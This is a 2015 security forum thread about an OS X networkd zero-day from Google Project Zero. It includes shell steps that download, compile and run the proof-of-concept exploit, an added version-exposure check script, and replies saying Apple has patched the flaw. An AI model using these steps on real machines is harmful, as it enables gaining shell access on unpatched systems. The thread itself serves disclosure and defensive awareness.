
OS X Live Exploits


#1 iangcarroll


Posted 22 January 2015 - 06:21 PM

OS X currently has at least one active "zero day" (it was released to the public after 90 days of no fix from Apple). It exploits a flaw in the networking daemon to gain shell access.

 

This flaw is exploitable on <= 10.9.5. Yosemite is not affected. More alarming is that no antivirus currently blocks this executable.

 

Source: https://code.google.com/p/google-security-research/issues/detail?id=121

 

Build the proof of concept:

gcc # launches dev tool installer if not present
mkdir /tmp/networkd_poc
cd /tmp/networkd_poc
git clone git@github.com:rodionovd/liblorgnette.git
curl 'https://google-security-research.googlecode.com/issues/attachment?aid=1210000000&name=sysmond_exploit_writeup.c&token=ABZ6GAe572CH9_WQUWSd2SBooTBV6ZZMjw%3A1421968517496' > networkd_exploit.c # may need to replace with your own link from https://code.google.com/p/google-security-research/issues/detail?id=121
clang -o networkd_exploit networkd_exploit.c liblorgnette/lorgnette.c -framework CoreFoundation
./networkd_exploit
ls /tmp | grep hello_ # should see hello_networkd

Edited by iangcarroll, 22 January 2015 - 06:22 PM.

Ian Carroll https://ian.sh • Certly Inc
 
Member of the Bleeping Computer A.I.I. early response team!
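An added example, not part of the thread or the PoC: a small POSIX sh exposure check built on the two facts the post gives (affected releases are <= 10.9.5, Yosemite is not) plus the /tmp/hello_networkd marker the build steps say the PoC leaves behind. The function names and the 3-component version encoding are my own assumptions.

```shell
#!/bin/sh
# Added example (not from the thread). Decides whether an OS X version
# string falls in the range the post calls affected (<= 10.9.5).

# vernum: encode "a.b.c" as a single integer so dotted versions compare
# numerically ("10.9.5" -> 10009005, "10.10" -> 10010000, "10.10.2" -> 10010002).
# Missing components count as 0; awk turns "" into 0 for %03d.
vernum() {
    printf '%s' "$1" | awk -F. '{ printf "%d%03d%03d", $1, $2, $3 }'
}

# is_affected: true (exit 0) when the version is <= 10.9.5, the ceiling
# stated in the post; Yosemite (10.10.x) therefore reports not affected.
is_affected() {
    [ "$(vernum "$1")" -le "$(vernum 10.9.5)" ]
}

# poc_artifact_present: the build steps say the PoC drops /tmp/hello_networkd;
# its presence on a host is a crude indicator that the PoC was run there.
poc_artifact_present() {
    [ -e /tmp/hello_networkd ]
}

# check_host: on OS X read the live version via sw_vers (a real Apple tool);
# elsewhere just report that this is not an OS X host.
check_host() {
    if command -v sw_vers >/dev/null 2>&1; then
        v=$(sw_vers -productVersion)
        if is_affected "$v"; then
            echo "$v: in the affected range (<= 10.9.5)"
        else
            echo "$v: outside the affected range"
        fi
        poc_artifact_present && echo "warning: /tmp/hello_networkd exists"
    else
        echo "sw_vers not found; not an OS X host"
    fi
}

check_host
```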



#2 Buddyme2


Posted 26 January 2015 - 05:13 AM

Better late than never.

 

Apple's OS X 10.10.2 to Fix Security Vulnerabilities Exposed by Google's Project Zero



#3 dante12


Posted 28 January 2015 - 10:23 AM

The current update closes the flaws: http://support.apple.com/kb/DL1785?viewlocale=de_DE&locale=de_DE



#4 iangcarroll


Posted 28 January 2015 - 06:10 PM

That's good. :)

 

Still curious why nobody flags this file (yet); hopefully heuristics would catch any sample in the wild... https://www.virustotal.com/en/file/c722515e3685750241af96690526bd8966483065e5b635e8c55efb8a3c847cd8/analysis/1422486572/

